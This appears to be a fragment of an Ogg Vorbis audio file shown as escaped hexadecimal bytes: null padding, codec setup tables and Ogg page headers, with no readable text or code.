0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x0E\x00\x00\x01\x16\x42\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\x24\x41\x92\x20\x49\xD0\x34\x80\x64\x59\xF0\x34\x68\x1A\x4C\x13\x20\x59\x16\x34\x0D\x9A\x06\xD3\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\x68\x1A\x34\x0D\xA2\x08\x90\x34\x0D\x9A\x06\x4D\x83\x28\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x79\x1A\x34\x0D\x9A\x06\x51\x04\x48\x9A\x07\x4D\x83\xA6\x41\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x4C\x13\xA2\x08\x51\x84\x69\x02\x34\xD3\x84\x28\x42\x14\x61\x9A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\xE2\x58\x16\x00\x00\x38\x92\x63\x59\x00\x00\xE0\x38\x8E\x65\x01\x00\x80\x65\x59\x9A\x06\x00\x00\x96\x65\x69\x1A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x28\x00\x00\x87\xA2\x58\x16\x70\x1C\xCB\x02\x8E\x63\x59\x40\x92\x2C\x0B\x60\x59\x00\xCD\x03\x68\x1A\x40\x14\x01\x80\x00\x00\x80\x02\x07\x00\x80\x00\x1B\x34\x25\x16\x07\x28\x34\x64\x25\x00\x10\x05\x00\xE0\x50\x14\xCB\xD2\x34\x51\xE4\x38\x9A\xA6\x69\xA2\xC8\x71\x34\x4D\xD3\x44\x91\x65\x69\x9A\xE7\x99\x26\x34\xCD\xF3\x4C\x13\x9E\xE7\x79\xA6\x09\xCF\xF3\x3C\xD3\x84\x69\x8A\xA2\xAA\x02\x51\x54\x55\x01\x00\x00\x05\x0E\x00\x00\x01\x36\x68\x4A\x2C\x0E\x50\x68\xC8\x4A\x00\x20\x24\x00\xC0\xE1\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x68\x9A\xAA\xCA\x71\x34\xCD\xF3\x44\x51\x14\x4D\x53\x55\x55\x95\xE3\x58\x96\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\xCB\xD2\x34\xCF\x13\x45\x51\x34\x4D\x55\x75\x5D\x68\x9A\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\x3C\xCF\xF3\x44\xD1\x14\x4D\x55\x55\x5D\x17\x9E\xE7\x79\xA2\x68\x9A\xAA\xA9\xAA\xAE\x0B\x51\x14\x45\xD3\x34\x4D\x55\x55\x55\xD7\x05\xA2\x68\x9A\xA6\xA9\xAA\xAE\xEA\xBA\xC0\xF3\x44\xD1\x34\x55\xD5\x75\x5D\x17\x78\x9E\x28\x9A\xA6\xAA\xBA\xAE\xEB\x02\x51\x34\x4D\xD5\x54\x55\xD7\x75\x5D\x80\x69\x9A\xA6\xAA\xBA\xAE\xEC\x02\x54\x55\x55\x55\xD7\x75\x65\x17\xA0\xAA\xAA\xAA\xAA\xAE\x2B\xCB\x00\x55\x75\x5D\xD7\x75\x5D\x59\x06\xA0\xAA\xAE\xEB\xBA\xB2\x2C\x00\x00\xE0\xC0\x01\x00\x20\xC0\x08\x3A\xC9\xA8\xB2\x08\x1B\x4D\xB8\xF0\x00\x14\x1A\xB2\x22\x00\x88\x02\x00\x00\x8C\x51\x4A\x31\xA5\x0C\x63\x12\x42\x09\x21\x62\x4C\x42\x28\x21\x54\x52\x4A\x29\xA9\x94\x0A\x42\x29\xA5\x94\x50\x41\x28\xA1\xA4\x10\x32\x29\x29\xA5\x54\x4A\x05\xA1\x84\x50\x4A\xA8\x20\x94\x52\x4A\x29\x05\x00\x80\x1D\x38\x00\x80\x1D\x58\x08\x85\x86\xAC\x04\x00\xF2\x00\x00\x08\x63\x94\x62\xCC\x39\xE7\x24\x42\x4A\x31\xE6\x9C\x73\x12\x21\xA5\x18\x73\xCE\x39\xA9\x14\x63\xCE\x39\xE7\x9C\x94\x92\x31\xE7\x9C\x73\x4E\x4A\xC9\x98\x73\xCE\x39\x27\xA5\x64\xCC\x39\xE7\x9C\x93\x52\x3A\xE7\x9C\x73\xCE\x49\x29\xA5\x74\xCE\x39\xE7\xA4\x94\x52\x42\xE8\x9C\x83\x52\x4A\x29\x9D\x73\xCE\x39\x01\x00\x40\x05\x0E\x00\x00\x01\x36\x8A\x6C\x4E\x30\x12\x54\x68\xC8\x4A\x00\x20\x15\x00\xC0\xE0\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x69\x49\x92\xA6\x79\x9E\x28\x9A\xA6\xAA\x6A\x92\xA4\x69\x9E\x27\x8A\xA6\xA9\xAA\x3C\xCF\xF3\x44\x51\x14\x4D\x53\x55\x79\x9E\xE7\x89\xA2\x28\x9A\xA6\xAA\x72\x5D\x51\x14\x45\xD3\x34\x4D\x55\xE5\xBA\xA2\x27\x8A\xA6\xA9\xAA\xAE\x0A\xD1\x14\x45\xD3\x54\x55\xD7\x85\x69\x8A\xA2\x69\xAA\xAA\xEB\x42\x96\x4D\xD3\x54\x5D\xD7\x75\x61\xDB\xA6\xA9\xAA\xAA\xEA\xBA\x40\x75\x55\xD5\x75\x5D\x19\xB8\xAE\xAA\xBA\xAE\x2C\x0B\x00\x00\x4F\x70\x00\x00\x2A\xB0\x61\x75\x84\x93\xA2\xB1\xC0\x42\x43\x56\x02\x00\x19\x00\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xA4\x10\x42\x48\x29\x85\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x54\x00\x00\x80\x10\x29\xA5\x94\x52\x4A\x29\x11\x63\x52\x4A\x29\xA5\x94\x52\x22\xE6\xA4\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x21\x84\x50\x00\x20\x76\x85\x03\xC0\x4E\x84\x0D\xAB\x23\x9C\x14\x8D\x05\x16\x1A\xB2\x12\x00\x08\x07\x00\x00\x8C\x41\x8A\x31\x08\x29\xB5\xD6\x62\x85\x90\x62\xCE\x49\x49\x29\xC6\x18\x2B\x84\x18\x73\x8E\x4A\x4A\x2D\xB6\x18\x34\xE6\x1C\x84\x94\x5A\x6B\x31\xD7\xA0\x31\xE7\x20\xA4\xD2\x5A\x8C\x35\x06\xD5\x42\x28\xA5\xB5\x18\x6B\xAD\x35\xB8\x14\x3A\x2A\xA9\xC5\x18\x6B\xAD\x41\x08\x95\x52\x8A\x31\xC6\x1A\x73\x0D\x42\xA8\x92\x42\x6C\xB1\xE6\x9A\x6B\x10\xC2\xD6\xD4\x5A\xAC\xB5\xE7\x9C\x83\x10\x3A\xB7\x14\x53\x8C\x31\xF7\x1A\x84\x10\x42\xC6\x1A\x6B\xCD\xB9\xE7\x20\x84\x10\xB6\xD6\x56\x5B\xAF\xB9\x06\x21\x84\xF0\x41\xD6\x9A\x73\x0E\x3A\x08\x21\x84\x0F\xB2\xD6\x9A\x83\xCE\x05\x00\x98\x3C\x38\x00\x40\x25\xD8\x38\xC3\x4A\xD2\x59\xE1\x68\x70\xA1\x21\x2B\x01\x80\xDC\x00\x00\x04\x21\xA5\x18\x73\xCE\x39\x07\x21\x84\x10\x42\x08\x29\x42\x8C\x31\xE6\x9C\x73\x10\x42\x08\x21\x84\x52\x52\x84\x18\x63\xCC\x39\xE7\x20\x84\x10\x42\x08\x21\xA4\x8C\x31\xE6\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x49\x29\x65\xCC\x39\xE7\x20\x84\x10\x42\x29\xA5\x94\x92\x52\xEA\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x29\x25\xA5\xD4\x39\xE7\x20\x84\x10\x42\x09\xA5\x94\x52\x4A\x4A\xA9\x73\x0E\x42\x08\x21\x84\x52\x4A\x29\xA5\x94\x94\x52\x4A\x9D\x83\x10\x42\x28\xA5\x94\x52\x4A\x29\x29\xA5\x94\x42\x08\x21\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\x85\x10\x42\x28\xA5\x94\x52\x4A\x29\xA5\xA4\x94\x52\x0A\x21\x84\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x08\xA1\x94\x52\x4A\x29\xA5\x94\x92\x52\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x29\x25\xA5\x94\x52\x4A\xA5\x84\x52\x4A\x29\xA5\x94\x52\x4A\x4A\x29\xA5\x94\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x94\x52\x4A\x29\xA5\x54\x4A\x29\xA5\x94\x52\x4A\x29\x29\xA5\x94\x52\x4A\xA9\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\xA5\x96\x52\x29\xA5\x94\x52\x4A\x29\xA5\xB4\xD4\x5A\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x4A\x29\x95\x52\x4A\x29\xA5\x94\x52\x00\x00\xD0\x81\x03\x00\x40\x80\x11\x95\x16\x62\xA7\x19\x57\x1E\x81\x23\x0A\x19\x26\xA0\x42\x43\x56\x02\x00\x64\x00\x00\x08\xA2\x14\x53\x4A\xAD\x45\x82\x2A\xC9\x9C\xC4\x5E\x42\x25\x15\x73\x90\x5A\x8A\x28\x93\x4E\x5A\x0E\xAE\x43\xD0\x20\xE6\xA4\x95\x8A\x39\x84\x94\x93\x54\x3A\x07\x95\x52\x0C\x4A\x2A\x21\x75\x4C\x29\x06\x29\x96\x1C\x42\xC6\x98\x93\x9C\x82\x4A\xA1\x63\x0E\x00\x00\x00\x41\x00\x00\x81\x90\x09\x04\x0A\xA0\xC0\x40\x06\x00\x1C\x20\x24\x48\x01\x00\x85\x05\x86\x0E\x11\x22\x40\x8C\x02\x03\xE3\xE2\xD2\x06\x00\x20\x08\x91\x19\x22\x11\xB1\x18\x24\x26\x54\x03\x45\xC5\x74\x00\xB0\xB8\xC0\x90\x0F\x00\x19\x1A\x1B\x69\x17\x17\xD0\x65\x80\x0B\xBA\xB8\xEB\x40\x08\x41\x08\x42\x10\x8B\x03\x28\x20\x01\x07\x27\xDC\xF0\xC4\x1B\x9E\x70\x83\x13\x74\x8A\x4A\x1D\x08\x00\x00\x00\x00\xC0\x03\x00\x3C\x00\x00\x24\x1B\x40\x44\x44\x34\x73\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x4F\x67\x67\x53\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x02\x00\x00\x00\xAE\x93\x37\x92\x01\x3C\x26\x27\x28\x02\x00\x00\x00\x00\x80\x07\x00\x1F\x00\x00\x49\x0A\x10\x11\x11\xCD\x1C\x47\x87\xC7\x07\x48\x88\xC8\x08\x49\x89\xC9\x09\x4A\x00\x00\x20\x80\x00\x00\x00\x00\x00\x08\x20\x00\x01\x01\x01\x00\x00\x00\x00\x80\x00\x00\x00\x00\x01\x01\x4F\x67\x67\x53\x00\x00\xC0\x2C\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x03\x00\x00\x00\xAB\x0F\x1C\x9B\x1D\x53\x4E\xFF\x3F\xFF\x26\xFF\x37\xFF\x63\xFF\x3F\xFF\x32\xFF\x4E\x49\x53\x57\x52\xFF\x6F\xFF\x47\xFF\x40\xFF\x53\xFF\xE4\x82\xB5\x62\xCE\xC7\xAC\x76\xA3\x78\x8A\xCD\x9B\xC9\x9B\x5A\x21\x6A\xF0\x3C\x5C\x71\x10\x72\x34\x7D\x95\xF8\xF6\xF3\x23\x00\x70\xB3\x75\xF3\x6E\xFF\x7F\x46\xFE\xAF\xE6\x92\xDB\xFC\xFE\x8B\xA3\x17\x0B\xD6\xBF\xBE\x9E\x8F\xBF\x7F\xC5\x2F\xDF\xB6\x88\xEF\xCE\x4D\xD4\x66\xF0\xD6\x2F\xA7\xD4\x39\xB3\x15\xC8\xEA\xF6\x87\xEA\x23\x00\xD4\x8A\x05\x36\x66\x92\xD4\x26\xE0\xAC\x98\x62\x63\x3F\x56\x35\xAB\x7B\xD9\xC7\x77\xD2\xCA\x35\x7D\xC1\x75\xF3\x47\x00\xB0\xF2\x72\xFD\x69\x59\x66\xF6\x57\xD5\x4E\x8C\xE3\xFC\xCB\x9B\x7F\x6D\x1F\xE1\x53\xFD\xEB\x3A\xBC\x7E\xEA\xD4\xEF\xCE\xE1\x3A\x42\x3A\xF7\x9B\x52\xE8\x33\x25\x89\xEA\x92\x9A\xAF\x3F\x29\x00\x5A\xCA\xB5\x41\x0A\xD9\x7F\x06\x28\x1B\x89\x82\xA1\x5A\x1B\xF8\xC0\x7F\x0E\x98\x48\xD6\xFD\x8A\xEC\x97\x3D\xDF\xB3\xBC\x70\x70\xF1\xCE\x1E\x39\x03\x00\x38\xF6\x71\xCC\x39\x46\x50\x65\x98\x9A\x0E\x00\x00\x00\x00\xC0\x5D\x7F\x85\x37\xE5\xD6\xB7\x4F\xF6\xD7\x9B\x68\x45\x00\x08\x9D\x79\xE6\x7D\xA7\xCD\xB8\x6B\x80\xD3\x18\x82\xB3\x08\x77\xF2\x6D\xDF\xF6\xF1\x3B\xD3\x1C\x90\xB2\x8E\x81\xEC\x30\xE1\x76\x57\x3F\xF2\x04\x73\x70\xDD\xA1\x7E\xEE\x2E\x62\xDC\xB7\x75\xF2\xDD\x13\x16\xD5\xA7\xB3\xF7\x59\xD0\x93\xDE\xCE\x7C\x70\xA3\x46\xFA\x66\x10\x1A\x51\xD9\x44\xC7\x09\x6C\x51\x45\xD7\xF3\xF1\xFB\x66\x56\x33\x7B\xB7\x52\xB1\xB4\x93\xC4\xD4\xB9\x26\xBB\x68\x37\x99\xEB\x69\x3E\x73\x99\x39\xD9\xCE\x7A\xDB\x2F\xDF\x47\x26\x4A\x2F\xCB\x0D\x33\x8A\x7C\x08\x97\x8C\xC7\x87\x51\x30\x0D\xA8\xFE\x01\x24\xBC\x5E\x57\x83\xE9\x36\x47\x12\x79\xC0\xD4\x74\xD6\x1F\xB5\xAF\x61\x37\xDA\x87\xA9\x6A\xF4\x34\x2F\x3E\xA4\xCC\xD1\xD2\x09\x11\x4C\xB2\x1B\x95\xD0\xEF\x50\x8D\x09\x51\xCC\x30\xEB\xA9\x7B\x27\xAB\x9A\x1B\x50\x36\xA3\xE9\x69\x55\x67\xF7\x61\x4F\xEF\x38\xEB\x9C\xE1\xF6\xF2\x9C\xAC\x12\xD5\x4C\xA2\x11\xD8\x0A\x6D\x64\xEF\x45\xD5\x47\x27\xFF\x17\xE3\x26\x36\xF1\xD5\xB4\xF2\x33\xB2\xDF\x0B\xC6\xAE\x89\x03\x2B\x20\x68\x19\x63\xDB\x5D\x5B\xD6\xF7\x87\x7A\x92\x05\xE1\xD3\x7F\xB6\x00\xDE\xBB\xA5\x32\x47\xA6\x7F\x8D\x8E\x76\x90\x28\xF4\xCB\xC5\xB2\xC5\xF9\xD7\x80\x1B\x89\xE2\xD6\x4D\x1A\x38\x0B\x28\xCC\xB9\xB5\x36\xAA\xAA\x94\x4E\x60\x00\x00\x00\x00\x80\xD7\x9D\xE3\xFB\x8F\xE3\xD3\xCD\x87\xF3\x41\xCD\xD2\xE7\x73\x73\x7C\x6B\x36\x18\x93\x83\x9B\xD6\xEE\xCB\x14\x37\x8F\x93\xDA\x21\x16\x83\xC6\x3A\xD2\xA5\x43\x2C\x46\xC6\xFC\x6F\xC4\xF2\x79\xCE\x20\x5D\x1E\x45\x2F\xDB\xF5\xE1\x86\x45\x27\x47\x9D\x78\xBF\xE2\x4B\xA3\xF9\x97\xDD\x62\x4E\x92\x9D\x93\xF3\xB3\xE5\x66\x7E\x77\x2A\x59\x66\x0D\xBA\xFC\x78\xCF\xF5\x64\x43\xDE\xBD\xAE\xC4\xAE\x12\xC2\xEB\x24\xD3\xDE\xEE\xDC\x77\xD6\x4B\x15\x45\xF7\x1C\x99\xBF\xB3\x43\x2A\xAE\xC7\xB8\xBD\x77\x55\xBF\x94\xE5\x72\xF3\x6B\x44\x64\xCF\x63\xE3\x24\xDB\x7F\xB9\x64\x51\x6A\x47\x72\x1B\xD7\x86\x5D\xDA\x4C\xB2\x9E\xFB\x21\x07\xCF\x74\x55\xEF\x5C\xA2\xD0\x61\xB1\x80\xD9\x67\x02\xA2\x9A\x47\x50\xEA\x49\xA6\x60\x4A\x37\xAF\xDD\x35\x55\xA3\xAC\x53\x44\xEC\xC1\xFD\x6A\x98\xE6\xE9\x69\x21\x12\x01\xA4\xCF\x14\x73\xAE\x06\x37\x02\xAE\xB7\x6A\xEA\x3E\xB0\x52\x32\xC6\x06\xD9\x7E\xA9\x99\x2F\xF8\xEB\x35\x76\x63\x7D\x8C\x94\x17\x6A\x7F\x94\x7E\x84\xD9\x23\x3D\xA6\xF8\xFB\xC9\xDB\xA4\xAF\x2C\x49\xE1\x3B\xA1\x10\x80\x02\x5E\x8B\x25\x69\x8D\xE0\xBF\x21\x21\x0C\x24\x0A\xDE\x5E\xA1\xCC\xC1\xFE\xE7\x80\x49\x39\x09\xFE\x22\x20\x2F\x97\xB5\xE3\xD8\xE7\xA8\x39\x2A\x28\x69\x3A\x74\x00\x00\x00\x00\x00\x64\x56\x6A\x55\xD5\x11\xB7\xB2\xBE\x75\x36\x26\xD6\x46\x9B\x7D\xD9\xFC\x6F\x5E\xD4\x7E\xD2\xC6\x4B\x72\x7A\xB0\xCE\x87\x3F\xBA\xF2\x81\xBF\xAC\x94\x9C\xD2\xFF\x90\xDE\x2F\x83\xFE\x3F\x3F\xCA\xCE\x07\x37\x29\x0B\x43\x5B\x25\xA6\xC3\x3D\xC7\xDE\x99\x4C\xEB\x69\xDB\x35\xE1\x9A\x5C\xEF\xF9\x8D\x9E\x6A\x22\x51\x4D\x77\xB4\x8A\xDC\x61\x21\x24\xDD\x55\x1E\xA2\x7D\x0C\x3F\xB1\xAF\x23\x96\x12\x49\x65\x27\xF5\x3C\x53\xF7\xCB\x6C\x71\xA2\xE2\x51\xFF\xE2\x55\x8D\xD1\xC3\x77\x1E\x35\xF7\x4B\x9B\xFF\x96\x30\x97\x77\x3E\xF7\xF8\xCC\x57\x34\xF3\xEE\x0C\xF3\x5E\x61\xED\xC3\xD3\x96\xE3\xD3\xAA\x98\x92\x72\xFE\x4F\x79\xE4\xCB\x21\x73\x6C\xCE\x50\xEF\x2F\xF2\x1C\x35\xFB\x55\x65\x1E\xBF\xB9\x84\x77\xE2\x24\x45\x29\xF4\x47\xC0\x5D\x49\xEF\x35\xAB\x87\x7E\xAE\x5F\xA6\x9F\x62\x3A\x1B\x38\x9D\x99\xCC\x0A\xD9\xDA\xF8\xFD\xAD\xC3\x9E\x4F\x5D\xA0\x93\x64\xEA\x9C\xCC\x97\xEA\x6E\xA6\x70\x0B\x8A\xFC\xEF\xFD\xCA\x58\x38\x40\x96\xBE\x5A\x8C\x26\x7E\xE9\xE1\x70\xA9\xEC\xCF\xE8\xD4\xBE\xAB\x48\xA6\xB0\xBE\x66\xF8\x4B\x7B\x79\x77\x2F\x5F\xA6\x98\x37\xE5\xF0\x0F\xBA\x2D\xAA\x02\x00\x3E\x7A\xB5\x14\x17\x21\xFE\x3B\x23\x12\xA6\xB2\x64\xDD\xD2\xAB\x05\x7C\xF0\xFF\x2C\x20\x21\xFF\xF2\xD3\xE8\xBD\x66\x62\x42\xDF\x32\x97\xA7\xF9\x71\xA7\x80\x91\xE9\x92\xD1\xC0\x19\x78\xCD\xE3\x02\x5E\xF7\x0B\x20\x40\xDB\xB6\x80\xA7\x1E\xFB\xF9\x04\x00\x00\x00\x00\x00\xF0\x49\xF3\x2A\xF5\xC9\xD8\xFB\x8B\xDD\xD1\xB8\xD9\x69\xD3\xD5\x7E\xAC\xE1\x25\x5E\xA9\xDF\xC8\x09\xF7\xFE\x31\x37\x45\x26\x34\xA7\x3D\xAF\x23\x7C\x13\x29\xBE\xAF\xA7\x08\xB9\x0D\xB8\x21\x94\x74\x97\x50\x47\xDB\x57\xA5\xAE\xA7\xD0\x11\x72\x3B\x4F\x2F\x1D\xF7\x2F\x97\xA5\x0B\x21\x77\x81\xBC\xB7\x57\xD3\xFD\x46\x43\xAF\x15\xD4\x94\x46\x1D\xF7\x99\x65\x66\xC6\xCD\xD3\xD7\x8F\x70\xD8\x59\xCF\x9C\xFC\xAF\x3E\x8F\x7A\x9C\x6C\xD5\x84\x5D\x92\xFC\x22\x7E\x32\xE7\x9A\xFB\x5D\xBE\xC6\x48\xED\x3F\x0D\x1A\x66\xAA\x4A\xCA\xFC\xE7\xA5\xCE\x17\x41\xC4\x59\xD5\xD4\x1D\xD9\x66\x7C\x76\xD5\x21\x89\x64\xEB\xC2\xDB\x0F\x88\xAE\xB9\xCE\x37\x1F\x96\xE6\x19\xD7\x32\xCF\xDE\x4F\xF7\xC9\x3D\x97\xBA\x3C\x5E\x3A\x59\x34\x6E\x56\x57\x0F\x53\x74\xA2\x9B\x19\x5A\x5E\xF8\x06\x8F\xEE\x08\x27\x96\xE8\x6B\x5A\xD5\x3D\x41\x05\x9D\x08\x01\x9A\xEA\xA9\xAB\xEA\xF8\x8A\x7B\x38\xD8\x5D\xA8\xC7\x75\x9B\x49\x0F\x54\xC4\xAE\xDF\x3E\xF2\x79\xA3\xD9\xD8\x93\xED\x52\x81\x9B\x32\x99\x3E\x8A\xEF\x7E\x24\xF4\x64\x83\x11\x00\x0A\x6A\xA2\xA2\xCF\xA8\x28\xAA\x00\xAA\xC8\xA3\x82\x88\x29\xAA\x8A\x20\x28\x22\x3F\x2F\x72\x20\x49\x92\x2C\xAC\xBF\x58\x7F\xD7\xAD\xE1\xB7\x15\x48\xC2\x00\x5E\x8B\x85\xC0\x05\xFE\x1B\x26\x6C\x24\xC1\xEF\x6E\x01\x4E\x19\xE6\xBF\x82\x92\x06\x92\xE0\xD7\x59\x92\xB8\x10\xB0\xCF\x63\xCC\xA5\xAA\x2A\x1C\x0E\x1F\x00\x00\x00\x00\x00\xEC\xCF\xEA\xA3\x9D\x1E\x85\xC4\xA8\xD9\x4E\xB9\x55\x99\x58\xA9\xBE\xAB\x76\x98\x79\xF5\xA6\x1A\x32\x19\x57\xD9\xD6\x57\xCB\xED\x53\x2E\x3E\x4D\xF7\x0A\x73\xAE\x91\xD7\x37\x1B\x28\xE9\xC4\xA7\x56\xFB\x31\x89\x2C\xBA\xBE\xF3\x5B\xCE\x96\x58\xB8\x2E\x2D\x5D\xE4\xDD\xB0\x38\xDE\x7C\x03\xF0\x5A\x8F\xEA\xF3\xD3\xE9\x2C\x5C\x0E\x78\x9C\xED\xBC\x7F\xE2\x9B\x58\x45\xEA\x3C\xA7\xEA\xE1\xF2\x4D\x1F\xE8\xC7\x92\x5B\xDB\xE1\xE3\xA9\xF3\xD6\x90\x4C\x7C\x73\x90\x9F\xEE\x54\x70\xDB\xBB\x4C\x2E\xCC\xF3\xAF\x75\xAF\xEA\xB6\xC9\xCC\xAA\xAC\x5A\x1E\xFF\x9F\x9D\xA9\x38\x24\xDE\x56\x9D\x49\xD7\x9D\xA2\x1A\xD5\x30\xBE\xFF\x12\x3F\x58\xBE\xEF\x9F\xAB\x59\x94\x11\x10\x4C\xAD\xB1\xF3\x5A\x88\x4B\xC4\xED\x06\x6A\x1C\xE7\x12\x06\xB5\xC2\x34\x2C\x5E\xCF\x4C\xE5\x66\x3E\x64\x26\xE5\x94\x28\x6C\xA7\x66\x9D\x9A\x31\x8C\x60\xCF\x79\x89\xFB\x8B\x6C\xA8\x6E\x31\x2D\x2F\x94\xA7\x33\x27\x9B\x21\x6D\xAE\x33\xF9\xEC\xEB\xD8\x08\x21\x21\x7C\x96\xDA\xC5\xB7\x9D\x8A\x51\x6F\xCC\xD5\x7E\x53\xB9\xEA\xD9\x77\x7C\x7B\xCF\x13\xD1\xB7\xC8\x77\x8F\x14\x43\x45\x9F\x85\x7B\xAA\xA8\x21\xFA\xA4\xCF\xE6\x0D\xF3\xB2\xE8\x4D\x13\x41\x00\xFE\xCB\x95\xC2\x45\xCD\xBF\x06\xB1\xFD\x32\x24\x8A\x1C\xCC\x65\x3A\x05\xF9\x9F\x01\x1C\x24\x8A\xAD\xF5\xBE\x6F\xC2\xB1\xCF\xAD\xF6\x59\xAD\xB2\xD1\xC9\x00\x00\x00\x00\x00\x69\x25\x8D\x17\x57\x5F\x87\xAF\x65\x6B\x46\x39\xE4\xDC\xAF\x72\xA7\x6B\x27\x21\x75\xD3\xF2\x96\x07\x13\xBD\xBB\x1D\xCE\xE7\xA1\xF1\x8A\x1F\xD9\x8E\x3D\xAF\x18\x8F\xA7\xC5\xE9\xCD\x39\x71\xBA\x96\x35\x07\x3B\x3D\x6F\xB9\xBB\x5E\x2C\x4E\x13\x71\xEE\x9D\x77\x93\xFE\xD7\x7B\x73\x42\xF4\xAF\x1A\x7E\x30\x13\x27\xF3\xFF\x88\x4B\xEA\xF1\x96\xF0\x39\x59\x05\xB7\xB6\xC9\x7D\xFE\xF1\x9C\x33\x6A\x82\xE6\xE4\x27\x34\x59\x49\x81\x2C\x98\xFD\x12\xA1\xDD\xD5\x79\xCC\x2E\x6B\x2A\x2B\x76\x1C\x23\x85\x50\x2F\xD9\xF4\xDD\xA7\x5F\xAD\x8D\x3A\xA2\xF8\xDA\x23\x58\x6B\x2E\x7C\xB8\xCA\xFB\xA5\x4D\xBA\x86\x6B\x77\x7D\xEC\xAF\x4F\xB3\x87\x83\x73\x38\xBD\x94\xAF\xD5\xB9\xF9\xB6\x71\xDD\x1B\x28\x60\xDC\x67\x47\xCC\xED\xC1\x24\x64\xAF\xD1\xCE\xC3\x94\x00\x6A\x1E\x3A\xA7\xA8\xD6\x7C\xCD\xE6\x70\x32\x67\x09\xFE\xFD\x52\xE7\x4E\xB5\xC8\xE2\x64\x51\x71\x4F\x56\xE2\x5D\xF3\xE2\x56\x77\xDB\x68\xB4\x0C\x32\x1